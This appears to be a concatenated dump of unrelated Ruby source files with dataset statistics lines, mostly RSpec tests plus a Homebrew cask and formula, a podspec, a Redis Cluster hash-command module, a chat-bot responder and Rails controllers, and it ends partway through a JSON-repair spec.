end | 26.917526 | 88 | 0.595174 |
01d58c45ca1b92f77efb12d1b18da14812cbbb93 | 1,365 | require "spec_helper"
describe OpenXml::DrawingML::Properties::ColorSystemColor do
include PropertyTestMacros
it_should_use tag: :sysClr, name: "color_system_color", value: :activeBorder
it_should_have_value_properties :tint_transform, :shade_transform, :complement,
:inverse, :grayscale, :alpha_transform, :alpha_offset,
:alpha_modulation, :hue_transform, :hue_offset, :hue_modulation,
:saturation_transform, :saturation_offset, :saturation_modulation,
:luminance_transform, :luminance_offset, :luminance_modulation,
:red_transform, :red_offset, :red_modulation, :green_transform,
:green_offset, :green_modulation, :blue_transform, :blue_offset,
:blue_modulation, :gamma, :inverse_gamma, value: :activeBorder
for_attribute(:value) do
with_value(:activeBorder) do # Not exhaustive
it_should_assign_successfully :captionText
it_should_output_expected_xml :captionText
end
end
for_attribute(:last_color) do
with_value("AA0033") do
it_should_assign_successfully :captionText
it_should_output "<a:sysClr val=\"captionText\" lastClr=\"AA0033\"/>", :captionText
end
end
end
| 44.032258 | 100 | 0.649084 |
bb4a16c3fcda20e09a77cfbe64e874715e971d85 | 654 | require_relative '../dr.rb'
describe DigitalRoot do
it 'can find the digital root of 16' do
expect(DigitalRoot.calculate(16)).to eq(7)
end
it 'can find the digital root of 123' do
expect(DigitalRoot.calculate(123)).to eq(6)
end
it 'can find the digital root of 999' do
expect(DigitalRoot.calculate(999)).to eq(9)
end
it 'can find the digital root of 1' do
expect(DigitalRoot.calculate(1)).to eq(1)
end
it 'can find the digital root of 42342' do
expect(DigitalRoot.calculate(42342)).to eq(6)
end
it 'can find the digital root of 42383442' do
expect(DigitalRoot.calculate(42383442)).to eq(3)
end
end
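# A minimal reference sketch of the digit-summing algorithm exercised above.
# This is an illustrative assumption only -- the real implementation is loaded
# from ../dr.rb and may differ -- so the sketch is defined only when that file
# did not already provide the class.
unless defined?(DigitalRoot)
  class DigitalRoot
    # Repeatedly sum the decimal digits until a single digit remains,
    # e.g. 42342 -> 4+2+3+4+2 = 15 -> 1+5 = 6.
    def self.calculate(number)
      number = number.digits.sum while number > 9
      number
    end
  end
end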
| 21.8 | 52 | 0.69419 |
ab54e72cc10ecc819804bb6b3796ebedc415b751 | 94 | module EadIndexer
class Engine < ::Rails::Engine
isolate_namespace EadIndexer
end
end
| 15.666667 | 32 | 0.755319 |
bb4cc27cc29fe47ccfa6c1e5ec570431c8b9891e | 124 | TotalProfiler::Config.profile_all = true
TotalProfiler::Config.add_class String, [:split]
TotalProfiler::Base.monkeypatch!
| 24.8 | 48 | 0.814516 |
61a20d7a5c324f335453281fd15c1276f5810813 | 460 | cask 'keychaincheck' do
version '1.3'
sha256 '00da69cc12330a4f2b60e4e05714be5e51c48dde1727540cb9f5c523669ebed7'
# eclecticlightdotcom.files.wordpress.com was verified as official when first introduced to the cask
url 'https://eclecticlightdotcom.files.wordpress.com/2017/09/keychaincheck13a.zip'
name 'KeychainCheck'
homepage 'https://eclecticlight.co/'
depends_on macos: [:sierra, :high_sierra]
app 'keychaincheck13a/KeychainCheck.app'
end
| 32.857143 | 102 | 0.797826 |
038139b489c2e953032f2ac65598db2299719a66 | 2,105 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Vote, type: :model do
before :each do
text = 'The Teams page contains a listing of the various Community Teams,
their responsibilities, links to their Wiki Home Pages and leaders,
communication tools, and a quick reference to let you know whether
Most Teams’ Wiki Home Pages provide information about who they are,
what they do, when their meetings are, and how to contact them.
Using these pages, teammates are able to communicate and
LooTeamsFor participating on the Country area team contributing to
a Local Development of Localization and Internationalization and
Like most communities, we have our rules and governing body.
Anyone can join and participate in most, if not all, of our Teams
and Projects. But if you want an “@ubuntu.com” e-mail address, it
has to be earned. Find out how in our Membership section.
As an active member of our community, you probably should check out
what else is going on in the world of Ubuntu:
The Fridge articles all the latest News and Upcoming Events.
Planet Ubuntu is a collection of community blogs.
If you are interested in getting to know other Ubuntu users or
seeing a list of Ubuntu teams outside the general Ubuntu world,
check out our social network. '
@user = User.create!(email: '[email protected]', name: 'foo bar', password: 'foobar')
@article = Article.create(title: 'title123', text: 'text123', author_id: @user.id)
@article2 = Article.create(title: 'title123', text: text, author_id: @user.id)
@vote = Vote.create(user_id: @user.id, article_id: @article.id)
end
context 'with valid details' do
it 'should create a vote' do
expect(@article.votes.count).to eq(1)
end
end
context 'with valid details' do
it 'should submit a users vote on article' do
expect(@article.votes.count).to eq(1)
end
end
end
| 46.777778 | 91 | 0.675534 |
f78ef801d15bbb1b25c5f3ac5be0b8f09bd05853 | 1,874 | # encoding: UTF-8
require "net/http"
require "nokogiri"
class NicknameResponder < Bitbot::Responder
include Bitbot::Responder::Wit
WORLDS = {
pirate: {
uri: "http://mess.be/pirate-names-male.php",
response: "Arrr! Yer pirate name be {{nick}}",
selector: ".normalText font b"
},
wutang: {
uri: "http://mess.be/inickgenwuname.php",
response: "Your Wu-Tang Clan name is {{nick}}",
selector: "center b font:not(.normalText)"
},
blues: {
uri: "http://mess.be/inickgenbluesmalename.php",
response: "Welcome to the Crossroads, {{nick}}",
selector: "center > .boldText"
},
potter: {
uri: "http://mess.be/harry-potter-names-male.php",
response: "Here is your wizarding name: {{nick}}",
selector: "center .normalText font b"
},
hacker: {
uri: "http://mess.be/inickgenhacker.php",
response: "Welcome to the Matrix, {{nick}}",
selector: "center > p.normalText > b"
}
}
category "Miscellaneous"
help "misc:nickname <world>",
description: "Your nickname for a given world (e.g. pirate, wutang, blues, potter, hacker)",
examples: ["what's my hacker nickname?", "if I were in harry potter, my nick name is?"]
intent "nickname", :nickname, entities: { nickname_world: nil }
route :nickname, /^misc:nickname\s+(.*)$/i do |world_type|
world = WORLDS[world_type.to_sym]
raise(Bitbot::Response, "I don't know of this \"#{world_type}\" world.") unless world
respond_with(world[:response].gsub("{{nick}}", nickname_for_world(world)))
end
private
def nickname_for_world(world)
res = Net::HTTP.post_form(URI.parse(world[:uri]), realname: message.user_name)
nick = Nokogiri::HTML(res.body).css(world[:selector]).map(&:text).join(" ")
nick.gsub(/\n/, " ").gsub(/\s+/, " ").gsub(/^\s|\s$/, "")
end
end
| 31.762712 | 99 | 0.622732 |
28066c52773865f051113027edf9a9e7ab01f385 | 1,480 | require File.expand_path(File.dirname(__FILE__) + '/edgecase')
class DiceSet
attr_reader :values
def roll(n)
@values = (1..n).map { rand(6) + 1 }
end
end
class AboutDiceSet < EdgeCase::Koan
def test_can_create_a_dice_set
dice = DiceSet.new
assert_not_nil dice
end
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6
dice = DiceSet.new
dice.roll(5)
assert dice.values.is_a?(Array), "should be an array"
assert_equal 5, dice.values.size
dice.values.each do |value|
assert value >= 1 && value <= 6, "value #{value} must be between 1 and 6"
end
end
def test_dice_values_do_not_change_unless_explicitly_rolled
dice = DiceSet.new
dice.roll(5)
first_time = dice.values
second_time = dice.values
assert_equal first_time, second_time
end
def test_dice_values_should_change_between_rolls
dice = DiceSet.new
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
assert_not_equal first_time, second_time,
"Two rolls should not be equal"
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this.
end
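  # One possible answer to the question above (an added illustration, not part
  # of the original koan): repeat the roll several times and require at least
  # one result to differ. A spurious failure would now need every re-roll to
  # repeat the first result, a (1/6**5) chance per roll, which is vanishingly
  # unlikely across twenty rolls.
  def test_repeated_rolls_are_not_all_identical
    dice = DiceSet.new
    dice.roll(5)
    first_time = dice.values
    rerolls = (1..20).map { dice.roll(5) }
    assert rerolls.any? { |values| values != first_time },
           "twenty identical re-rolls almost certainly mean the dice are not random"
  end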
def test_you_can_roll_different_numbers_of_dice
dice = DiceSet.new
dice.roll(3)
assert_equal 3, dice.values.size
dice.roll(1)
assert_equal 1, dice.values.size
end
end
| 22.769231 | 79 | 0.700676 |
ff1e08b6950dc46ce029aacf68978f549b3e4b36 | 1,225 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe Elasticsearch::DSL::Search::Aggregations::Sum do
let(:search) do
described_class.new
end
describe '#to_hash' do
it 'can be converted to a hash' do
expect(search.to_hash).to eq(sum: {})
end
end
context '#initialize' do
let(:search) do
described_class.new(foo: 'bar')
end
it 'takes a hash' do
expect(search.to_hash).to eq(sum: { foo: 'bar' })
end
end
end
| 27.840909 | 63 | 0.721633 |
61c10d47434bf7c6a74b51279bf136474f23e6a7 | 6,543 | require 'spec_helper'
describe Gitlab::HealthChecks::FsShardsCheck do
def command_exists?(command)
_, status = Gitlab::Popen.popen(%W{ #{command} 1 echo })
status == 0
rescue Errno::ENOENT
false
end
def timeout_command
@timeout_command ||=
if command_exists?('timeout')
'timeout'
elsif command_exists?('gtimeout')
'gtimeout'
else
''
end
end
let(:metric_class) { Gitlab::HealthChecks::Metric }
let(:result_class) { Gitlab::HealthChecks::Result }
let(:repository_storages) { [:default] }
let(:tmp_dir) { Dir.mktmpdir }
let(:storages_paths) do
{
default: { path: tmp_dir }
}.with_indifferent_access
end
before do
allow(described_class).to receive(:repository_storages) { repository_storages }
allow(described_class).to receive(:storages_paths) { storages_paths }
stub_const('Gitlab::HealthChecks::FsShardsCheck::TIMEOUT_EXECUTABLE', timeout_command)
end
after do
FileUtils.remove_entry_secure(tmp_dir) if Dir.exist?(tmp_dir)
end
shared_examples 'filesystem checks' do
describe '#readiness' do
subject { described_class.readiness }
context 'storage points to not existing folder' do
let(:storages_paths) do
{
default: { path: 'tmp/this/path/doesnt/exist' }
}.with_indifferent_access
end
it { is_expected.to include(result_class.new(false, 'cannot stat storage', shard: :default)) }
end
context 'storage points to directory that has both read and write rights' do
before do
FileUtils.chmod_R(0755, tmp_dir)
end
it { is_expected.to include(result_class.new(true, nil, shard: :default)) }
it 'cleans up files used for testing' do
expect(described_class).to receive(:storage_write_test).with(any_args).and_call_original
subject
expect(Dir.entries(tmp_dir).count).to eq(2)
end
context 'read test fails' do
before do
allow(described_class).to receive(:storage_read_test).with(any_args).and_return(false)
end
it { is_expected.to include(result_class.new(false, 'cannot read from storage', shard: :default)) }
end
context 'write test fails' do
before do
allow(described_class).to receive(:storage_write_test).with(any_args).and_return(false)
end
it { is_expected.to include(result_class.new(false, 'cannot write to storage', shard: :default)) }
end
end
end
describe '#metrics' do
subject { described_class.metrics }
context 'storage points to not existing folder' do
let(:storages_paths) do
{
default: { path: 'tmp/this/path/doesnt/exist' }
}.with_indifferent_access
end
it { is_expected.to all(have_attributes(labels: { shard: :default })) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_accessible, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_readable, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_writable, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0)) }
end
context 'storage points to directory that has both read and write rights' do
before do
FileUtils.chmod_R(0755, tmp_dir)
end
it { is_expected.to all(have_attributes(labels: { shard: :default })) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_accessible, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_readable, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_writable, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0)) }
end
end
end
context 'when timeout kills fs checks' do
before do
stub_const('Gitlab::HealthChecks::FsShardsCheck::COMMAND_TIMEOUT', '1')
allow(described_class).to receive(:exec_with_timeout).and_wrap_original { |m| m.call(%w(sleep 60)) }
FileUtils.chmod_R(0755, tmp_dir)
end
describe '#readiness' do
subject { described_class.readiness }
it { is_expected.to include(result_class.new(false, 'cannot stat storage', shard: :default)) }
end
describe '#metrics' do
subject { described_class.metrics }
it 'provides metrics' do
expect(subject).to all(have_attributes(labels: { shard: :default }))
expect(subject).to include(an_object_having_attributes(name: :filesystem_accessible, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_readable, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_writable, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0))
end
end
end
context 'when popen always finds required binaries' do
before do
allow(described_class).to receive(:exec_with_timeout).and_wrap_original do |method, *args, &block|
begin
method.call(*args, &block)
rescue RuntimeError, Errno::ENOENT
raise 'expected not to happen'
end
end
stub_const('Gitlab::HealthChecks::FsShardsCheck::COMMAND_TIMEOUT', '10')
end
it_behaves_like 'filesystem checks'
end
context 'when popen never finds required binaries' do
before do
allow(Gitlab::Popen).to receive(:popen).and_raise(Errno::ENOENT)
end
it_behaves_like 'filesystem checks'
end
end
| 35.754098 | 116 | 0.678282 |
e99e7cf4a3fe9e21ba184f8498bf422335e13170 | 1,614 | #
# Be sure to run `pod lib lint XMX_NetWorking.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XMX_NetWorking'
s.version = '0.1.0'
s.summary = 'A short description of XMX_NetWorking.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/736497373/XMX_NetWorking'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '736497373' => '[email protected]' }
s.source = { :git => 'https://github.com/736497373/XMX_NetWorking.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'XMX_NetWorking/Classes/**/*'
# s.resource_bundles = {
# 'XMX_NetWorking' => ['XMX_NetWorking/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'AFNetworking'
end
| 37.534884 | 108 | 0.648079 |
ab443c264110cf251d2ce1d2d9d9e0ca38307603 | 375 | class NodeClassMembership < ApplicationRecord
validates_presence_of :node_id, :node_class_id
include NodeGroupGraph
has_parameters
belongs_to :node
belongs_to :node_class
fires :added_to, :on => :create, :subject => :node_class, :secondary_subject => :node
fires :removed_from, :on => :destroy, :subject => :node_class, :secondary_subject => :node
end
| 26.785714 | 92 | 0.738667 |
1a91180b87779c5efd5cdd4f7fa87c18d18b81f4 | 3,450 | module HQMF1
# Represents a data criteria specification
class DataCriteria
include HQMF1::Utilities
attr_accessor :code_list_id, :derived_from, :definition, :status, :negation, :specific_occurrence
# Create a new instance based on the supplied HQMF entry
# @param [Nokogiri::XML::Element] entry the parsed HQMF entry
def initialize(entry, occurrence_counters)
@entry = entry
template_map = HQMF::DataCriteria.get_template_id_map()
oid_xpath_file = File.expand_path('../data_criteria_oid_xpath.json', __FILE__)
oid_xpath_map = JSON.parse(File.read(oid_xpath_file))
template_id = attr_val('cda:act/cda:templateId/@root') || attr_val('cda:observation/cda:templateId/@root')
# check to see if this is a derived data criteria. These are used for multiple occurrences.
derived_entry = @entry.at_xpath('./*/cda:sourceOf[@typeCode="DRIV"]')
if derived_entry
derived = derived_entry.at_xpath('cda:act/cda:id/@root') || derived_entry.at_xpath('cda:observation/cda:id/@root')
@derived_from = derived.value
occurrence_counters[@derived_from] ||= HQMF::InstanceCounter.new
@occurrence_key = occurrence_counters[@derived_from].next-1
@specific_occurrence = "#{('A'..'ZZ').to_a[@occurrence_key]}"
end
template = template_map[template_id]
if template
@negation=template["negation"]
@definition=template["definition"]
@status=template["status"]
@key=@definition+(@status.empty? ? '' : "_#{@status}")
else
raise "Unknown data criteria template identifier [#{template_id}]"
end
# Get the code list OID of the criteria, used as an index to the code list database
@code_list_id = attr_val(oid_xpath_map[@key]['oid_xpath'])
unless @code_list_id
puts "\tcode list id not found, getting default" if !@derived_from
@code_list_id = attr_val('cda:act/cda:sourceOf//cda:code/@code')
end
puts "\tno oid defined for data criteria: #{@key}" if !@code_list_id and !@derived_from
end
# Get the identifier of the criteria, used elsewhere within the document for referencing
# @return [String] the identifier of this data criteria
def id
attr_val('cda:act/cda:id/@root') || attr_val('cda:observation/cda:id/@root')
end
    # Get the title of the criteria, which provides a human readable description
# @return [String] the title of this data criteria
def title
title = description
title = "Occurrence #{@specific_occurrence}: #{title}" if @derived_from
title
end
def description
if (@entry.at_xpath('.//cda:title'))
description = @entry.at_xpath('.//cda:title').inner_text
else
description = @entry.at_xpath('.//cda:localVariableName').inner_text
end
description
end
# Get a JS friendly constant name for this measure attribute
def const_name
components = title.gsub(/\W/,' ').split.collect {|word| word.strip.upcase }
if @derived_from
components << HQMF::Counter.instance.next
end
components.join '_'
end
def to_json
json = build_hash(self, [:id,:title,:code_list_id,:derived_from,:description, :definition, :status, :negation, :specific_occurrence])
{
self.const_name => json
}
end
end
end | 37.5 | 139 | 0.656522 |
210f32424336439c98b9a08d225817322c904f08 | 4,621 | # frozen_string_literal: true
require 'redis'
class RedisCluster
module Function
    # Hash implements Redis hash commands, with some adjustments for the cluster.
    # See https://redis.io/commands#hash. Most of the code is copied from
# https://github.com/redis/redis-rb/blob/master/lib/redis.rb.
#
# SETTER = [:hdel, :hincrby, :hincrbyfloat, :hmset, :hset, :hsetnx]
# GETTER = [:hexists, :hget, :hgetall, :hkeys, :hlen, :hmget, :hstrlen, :hvals, :hscan]
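    #
    # A minimal usage sketch (assumption: `cluster` is an already-configured
    # RedisCluster client that exposes these commands; construction details
    # are omitted here):
    #
    #   cluster.hset("user:1", "name", "alice")   # => true when the field was added
    #   cluster.hget("user:1", "name")            # => "alice"
    #   cluster.hgetall("user:1")                 # => {"name"=>"alice"}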
module Hash
# Delete one or more hash fields.
#
# @param [String] key
# @param [String, Array<String>] field
# @return [Fixnum] the number of fields that were removed from the hash
def hdel(key, field)
call(key, [:hdel, key, field])
end
# Increment the integer value of a hash field by the given integer number.
#
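      # @example
      #   redis.hincrby("hash", "counter", 2)
      #   # => 2 when the field was absent (Redis treats it as 0), otherwise the old value + 2
      #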
# @param [String] key
# @param [String] field
# @param [Fixnum] increment
# @return [Fixnum] value of the field after incrementing it
def hincrby(key, field, increment)
call(key, [:hincrby, key, field, increment])
end
# Increment the numeric value of a hash field by the given float number.
#
# @param [String] key
# @param [String] field
# @param [Float] increment
# @return [Float] value of the field after incrementing it
def hincrbyfloat(key, field, increment)
call(key, [:hincrbyfloat, key, field, increment], transform: Redis::Floatify)
end
# Set one or more hash values.
#
# @example
# redis.hmset("hash", "f1", "v1", "f2", "v2")
# # => "OK"
#
# @param [String] key
# @param [Array<String>] attrs array of fields and values
# @return [String] `"OK"`
def hmset(key, *attrs)
call(key, [:hmset, key] + attrs)
end
# Set the string value of a hash field.
#
# @param [String] key
# @param [String] field
# @param [String] value
# @return [Boolean] whether or not the field was **added** to the hash
def hset(key, field, value)
call(key, [:hset, key, field, value], transform: Redis::Boolify)
end
# Set the value of a hash field, only if the field does not exist.
#
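      # @example
      #   redis.hsetnx("hash", "f1", "v1")
      #   # => true if "f1" was not set before; false otherwise (the existing value is left unchanged)
      #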
# @param [String] key
# @param [String] field
# @param [String] value
# @return [Boolean] whether or not the field was **added** to the hash
def hsetnx(key, field, value)
call(key, [:hsetnx, key, field, value], transform: Redis::Boolify)
end
# Determine if a hash field exists.
#
# @param [String] key
# @param [String] field
# @return [Boolean] whether or not the field exists in the hash
def hexists(key, field)
call(key, [:hexists, key, field], transform: Redis::Boolify, read: true)
end
# Get the value of a hash field.
#
# @param [String] key
# @param [String] field
# @return [String]
def hget(key, field)
call(key, [:hget, key, field], read: true)
end
# Get all the fields and values in a hash.
#
# @param [String] key
# @return [Hash<String, String>]
def hgetall(key)
call(key, [:hgetall, key], transform: Redis::Hashify, read: true)
end
# Get all the fields in a hash.
#
# @param [String] key
# @return [Array<String>]
def hkeys(key)
call(key, [:hkeys, key], read: true)
end
# Get all the values in a hash.
#
# @param [String] key
# @return [Array<String>]
def hvals(key)
call(key, [:hvals, key], read: true)
end
# Get the number of fields in a hash.
#
# @param [String] key
# @return [Fixnum] number of fields in the hash
def hlen(key)
call(key, [:hlen, key], read: true)
end
# Get the values of all the given hash fields.
#
# @example
# redis.hmget("hash", "f1", "f2")
# # => ["v1", "v2"]
#
# @param [String] key
# @param [Array<String>] fields array of fields
# @return [Array<String>] an array of values for the specified fields
def hmget(key, *fields)
call(key, [:hmget, key] + fields, read: true)
end
# Returns the string length of the value associated with field in the hash stored at key.
#
# @param [String] key
# @param [String] field
      # @return [Fixnum] String length
def hstrlen(key, field)
call(key, [:hstrlen, key, field], read: true)
end
end
end
end
| 30.401316 | 95 | 0.571521 |
6aaf12058f406175c1bfdd04a3cebce243e2e71b | 1,824 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# +PaperRoleEligibleUsersController+ is responsible for communicating eligible users for
# a given paper and role.
class PaperRoleEligibleUsersController < ApplicationController
before_action :authenticate_user!
respond_to :json
def index
requires_user_can(:view_user_role_eligibility_on_paper, paper)
role = Role.find_by!(id: params[:role_id], journal_id: paper.journal_id)
eligible_users = EligibleUserService.eligible_users_for(
paper: paper,
role: role,
matching: params[:query]
)
render json: eligible_users, each_serializer: SensitiveInformationUserSerializer, root: 'users'
end
private
def paper
@paper ||= Paper.find_by_id_or_short_doi(params[:paper_id])
end
end
| 41.454545 | 99 | 0.774123 |
613067776b182dfa874138899fb3e8d73a958f13 | 315 | # frozen_string_literal: true
class SummariesController < ApplicationController
before_action :authenticate_user!
# Render the summary dashboard for a patron
#
# GET /summaries
# GET /summaries.json
def index
@patron = patron
end
private
def item_details
{ all: true }
end
end
| 15.75 | 49 | 0.701587 |
7ab8a80819f894564f69bb7bb0744f2574272d7f | 517 | require "did_you_mean/version"
require "did_you_mean/core_ext/name_error"
require "did_you_mean/spell_checkable"
require 'did_you_mean/spell_checkers/name_error_checkers'
require 'did_you_mean/spell_checkers/method_name_checker'
require 'did_you_mean/spell_checkers/null_checker'
require "did_you_mean/formatter"
module DidYouMean
IGNORED_CALLERS = []
SPELL_CHECKERS = Hash.new(NullChecker)
SPELL_CHECKERS.merge!({
"NameError" => NameErrorCheckers,
"NoMethodError" => MethodNameChecker
})
end
| 25.85 | 57 | 0.802708 |
5dc810076a3b528795d025780e959b1b1089922a | 1,388 | class Fonttools < Formula
include Language::Python::Virtualenv
desc "Library for manipulating fonts"
homepage "https://github.com/fonttools/fonttools"
url "https://files.pythonhosted.org/packages/47/7c/dd9dc174842a9bc6fdae89045e820acd8a53a2251b4a8e6d22c97e1c7d75/fonttools-4.25.2.zip"
sha256 "507f8e027967fe4ebfa913856b3acc6b77201e67d6a6978d3666863cbba884c3"
license "MIT"
head "https://github.com/fonttools/fonttools.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "c3bf47619aeffa821430c617aad930604f8ba9393cdf3b37d7fa9cb664785356"
sha256 cellar: :any_skip_relocation, big_sur: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, catalina: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, mojave: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, x86_64_linux: "2b4497b37560c090f7d41897d673686768499411ffb0cacfb665f60fcc228966"
end
depends_on "[email protected]"
def install
virtualenv_install_with_resources
end
test do
on_macos do
cp "/System/Library/Fonts/ZapfDingbats.ttf", testpath
system bin/"ttx", "ZapfDingbats.ttf"
end
on_linux do
assert_match "usage", shell_output("#{bin}/ttx -h")
end
end
end
| 39.657143 | 135 | 0.791066 |
bf8e1a776a408567f05cc05a71d7ec0e4db588c2 | 5,919 |
require 'rspec'
require 'json'
require 'yajl'
require 'oj'
require 'drjson'
describe DrJson do
def doctor
DrJson.new(:debug => true)
end
describe "completion" do
it "works" do
doctor.repair("{").should == "{}"
end
it "insert the object value if absent" do
doctor.repair('{"foo": ').should == '{"foo": null}'
end
it "closes array brackets" do
doctor.repair("[42").should == "[42]"
end
it "inserts missing trailing array elements" do
doctor.repair("[42,").should == "[42,null]"
doctor.repair("[42,7,").should == "[42,7,null]"
end
it "works" do
doctor.repair('{"foo": [42 ').should == '{"foo": [42 ]}'
doctor.repair('{"foo": [ ').should == '{"foo": [ ]}'
end
it "works" do
doctor.repair('{"foo": "bar').should == '{"foo": "bar"}'
doctor.repair('{"foo": "ba').should == '{"foo": "ba"}'
doctor.repair('{"foo": "').should == '{"foo": ""}'
doctor.repair('{"foo": ').should == '{"foo": null}'
doctor.repair('{"foo" ').should == '{"foo" :null}'
doctor.repair('{"foo ').should == '{"foo ":null}'
doctor.repair('{"foo').should == '{"foo":null}'
doctor.repair('{"f').should == '{"f":null}'
doctor.repair('{"').should == '{"":null}'
doctor.repair('{').should == '{}'
end
end
it "works" do
doctor.repair("[]").should == "[]"
doctor.repair("[42]").should == "[42]"
doctor.repair('{"foo": "bar"}').should == '{"foo": "bar"}'
end
it "empty strings" do
doctor.repair('{"":""}').should == '{"":""}'
end
it "works" do
doctor.repair('{"foo": 42 }').should == '{"foo": 42 }'
doctor.repair('{"foo": 42}').should == '{"foo": 42}'
end
it "multiline completion" do
doctor.repair('{"foo": "bar').should == '{"foo": "bar"}'
end
it "works" do
doctor.repair('{"foo": 42, "bar": 7 }').should == '{"foo": 42, "bar": 7 }'
end
it "works" do
doctor.repair('{"foo": {"bar" : "baz"} }').should == '{"foo": {"bar" : "baz"} }'
doctor.repair('{"foo": {"bar" : "baz').should == '{"foo": {"bar" : "baz"}}'
end
it "works" do
doctor.repair('{"foo": [] }').should == '{"foo": [] }'
doctor.repair('{"foo": [42] }').should == '{"foo": [42] }'
end
it "handles inclomplete (null|false|true) tokens" do
DrJson.new.repair('[tru').should == '[]'
DrJson.new.repair('[fals').should == '[]'
DrJson.new.repair('[nul').should == '[]'
end
it "handles inclomplete (null|false|true) tokens" do
DrJson.new.repair('[[tru').should == '[[]]'
DrJson.new.repair('[[[fal').should == '[[[]]]'
DrJson.new.repair('[[[[nul').should == '[[[[]]]]'
end
it "handles inclomplete (null|false|true) values" do
DrJson.new.repair('{"foo":tru').should == '{"foo":null}'
DrJson.new.repair('{"foo":{"bar":tru').should == '{"foo":{"bar":null}}'
end
it "handles inclomplete keys in pairs" do
DrJson.new.repair('{"foo').should == '{"foo":null}'
end
it "works" do
doctor.repair('{"foo": [42,7] }').should == '{"foo": [42,7] }'
doctor.repair('{"foo": [42, 7] }').should == '{"foo": [42, 7] }'
doctor.repair('{"foo": [42 ,7] }').should == '{"foo": [42 ,7] }'
doctor.repair('{"foo": [42 , 7] }').should == '{"foo": [42 , 7] }'
doctor.repair('{"foo": [42 , 7, 4711] }').should == '{"foo": [42 , 7, 4711] }'
end
it "supports all the null|false|true terminal symbols" do
doctor.repair('[null]').should == '[null]'
doctor.repair('[true]').should == '[true]'
doctor.repair('[false]').should == '[false]'
end
context "numbers" do
it "supports -" do
doctor.repair('{"foo": -42 }').should == '{"foo": -42 }'
end
it "supports floats" do
doctor.repair('{"foo": 7.42 }').should == '{"foo": 7.42 }'
end
it "supports exponents" do
doctor.repair('{"foo": 1e-4 }').should == '{"foo": 1e-4 }'
doctor.repair('{"foo": 1E-4 }').should == '{"foo": 1E-4 }'
doctor.repair('{"foo": 1e+4 }').should == '{"foo": 1e+4 }'
doctor.repair('{"foo": 1E+4 }').should == '{"foo": 1E+4 }'
doctor.repair('{"foo": 1e4 }').should == '{"foo": 1e4 }'
